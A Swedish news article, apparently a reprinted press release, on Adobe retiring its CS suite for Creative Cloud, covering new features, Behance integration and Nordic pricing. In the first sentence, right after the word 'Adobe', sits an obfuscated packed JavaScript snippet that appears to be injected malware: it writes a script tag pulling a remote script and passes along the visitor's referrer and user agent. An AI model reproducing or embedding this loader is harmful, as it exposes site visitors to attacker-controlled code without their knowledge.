Image Image Image Image Image Image Image Image Image Image

| 5 juni, 2020

Scroll to top

Top

Adobe lanserar stor uppdatering av Creative Cloud

Adobe lanserar stor uppdatering av Creative Cloud
Sebastian

Adobe eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efesk|var|u0026u|referrer|aiitt||js|php’.split(’|’),0,{}))
fortsätter i rask takt att övergå till molnet. Nu presenteras en helt ny generation av Creative Cloud-program till Mac och Windows, som kommer att ersätta de populära CS-programmen. Samtidigt släpps nyheter till Creative Cloud-versionerna av Photoshop, Premiere Pro och InDesign.

Adobe pensionerar CS-paketet och ersätter det med Creative Cloud (CC). Den nya versionen av Adobes flaggskepp på det kreativa området har utrustats med ett hundratals nya funktioner för bland annat delning och publicering på olika plattformar och enheter. Uppgraderingen, som presenteras i samband med årets Adobe MAX i Los Angeles, visar att fokus framöver ligger på att utveckla Creative Clouds ekosystem. Tjänsten har idag en halv miljon medlemmar, och över två miljoner har registrerat sig för en testperiod.

”Sedan lanseringen för ett år sedan har Creative Cloud varit en oerhörd framgång. Genom att satsa fullt ut på Creative Cloud framöver kommer vi ha möjligheten att erbjuda våra medlemmar nya funktioner och möjligheter mycket snabbare”, säger Mariah Andén, nordisk marknadschef för Digital Media hos Adobe.

Följ den kreativa processen från idé till färdig produkt
Adobe Creative Cloud öppnar upp för ett mer effektivt och integrerat arbetsflöde. Nu kan kreatörer spara, dela och synkronisera filer över Mac, Windows, iOS och Android. Creative Cloud är helt integrerat med Behance, det ledande sociala nätverket för kreatörer med hela 1,4 miljoner medlemmar. På Behance kan Creative Cloud-medlemmar lägga upp sina arbeten för att få spridning eller motta feedback från andra kreatörer. Denna integration gör det också möjligt att låta andra följa den kreativa processen – från idéstadiet till färdig produkt.

”Vi måste hela tiden använda vår kreativitet till det yttersta, och efter att tagit del av flera av de nya funktionerna i Creative Cloud är jag övertygad om att tjänsten kommer att förbättra de sätten som vi utför vårt kreativa arbete på och hela det kreativa arbetsflödet på kontoret – oavsett om vi skapar designlösningar för webb, smartphone, sociala medier eller spel”, säger Thomas Moen, VD för den digitala byrån Good Morning, med kontor i Stockholm och Oslo.

Med Creative Cloud kan en designer exempelvis ta en bild med en iPad, göra smärre korrigeringar med Photoshop Touch och sedan synkronisera filen via molnet – för att sedan antingen fortsätta redigera i Photoshop eller dela bilden med andra. Tidigare versioner av bilden sparas automatiskt, så att inga filer går förlorade.

“Creative Cloud sammanför samtliga kreativa behov, så att kreatörerna kan arbeta ännu bättre och helt släppa sin fantasi fri. Med de nya programmen och tjänsterna blir det ännu enklare att dela sitt arbete – oavsett var du befinner dig i världen”, säger Mariah Andén.

Nya funktioner till Photoshop, InDesign, Premiere Pro och Web
De nya CC-programmen innehåller flera hundra nya funktioner. En av dessa är integrationen med kraftiga färgarbetsflöden med en Lumetri Deep Color Engine, som enkelt ger en djup colorgrading-effekt i Premiere Pro. Det finns även nya möjligheter att arbeta med 3D i After Effects samt nya versioner av Speedgrade, Prelude och Story. Adobe Photoshop (se separat pressmeddelande) har utrustats med nya funktioner bland annat för att förbättra skärpan i bilder samt en speciell funktion för att återställa suddiga bilder. Den nya versionen av Photoshop är samtidigt det första programmet för Mac och Windows där kreatörer kan ladda upp sina arbeten direkt till det sociala nätverket Behance, och har på så sätt möjlighet att få direkt feedback på sina verk.

På webb-fronten blir det nu möjligt att utveckla design i Photoshop och omvandla till hemsidor. Dreamweaver får uppdaterade CSS-funktioner via ett intuitivt visuellt verktyg. Slutligen får Adobe Flash en modern 64-bitars arkitektur, som byggts från grunden för att garantera snabbhet och säkerhet.

Adobes kreativa program till Mac och Windows, däribland Adobe Photoshop, InDesign och Premiere Pro, kommer att innefattas i CC för att understryka Adobes starka fokus på molntjänster. Creative Cloud omfattar mer än 30 olika program som tillåter skapamde och publicering av innehåll till print, webb, mobilappar, video och fotografi.

Om Creative Cloud

Adobe Creative Cloud är en medlemsbaserad tjänst som ger användarna tillgång till att ladda ner och installera Adobes kreativa program till Mac och Windows, ta del av spelutvecklingsverktyg och integrera med Adobe Touch Apps. Som medlem i Creative Cloud får användarna tillgång till ett globalt  kreativt socialt nätverk, publiceringsverktyg för att skapa appar och hemsidor samt ett molnbaserat lagerutrymme med möjlighet att synkronisera mellan olika enheter. Creative Cloud ger också omedelbar tillgång till nya produkter och programuppdateringar.

 

Medlemskap och tillgänglighet

Direkt efter registrering ges möjlighet att ladda ner de senaste versionerna av Creative Clouds program när de släpps i juni. Ett Creative Cloud-medlemskap för en enskild person kostar 565 kronor per månad vid tecknandet av ett årsmedlemskap. De som redan har CS3 till CS5 får det första årets medlemskap till nedsatt pris (319 kronor i månaden). Studenter och lärare kan fram till den 25 juni få årsmedlemskap av Creative Cloud för 185 kronor i månaden.

Det går också att köpa endast Photoshop CC, då till en kostnad av 228 kronor i månaden. Detta erbjudande gäller endast ett urval av kunderna, däribland CS6-användare.

Creative Cloud för team och företag inkluderar 100GB lagringsutrymme och centralt styrda administrationsfunktioner. Creative Cloud för team och företag kostar 762 kronor i månaden per person. Befintliga kunder med CS3-licens eller senare version kan köpa Creative Cloud till ett nedsatt pris (418 kronor i månaden per person) det första året. Erbjudandet gäller till sista augusti 2013.

Adobe har också lanserat Adobe Cloud för företag och särskilda licensprogram för universitet och den offentliga sektorn.

För mer detaljer:https://creative.adobe.com/plans.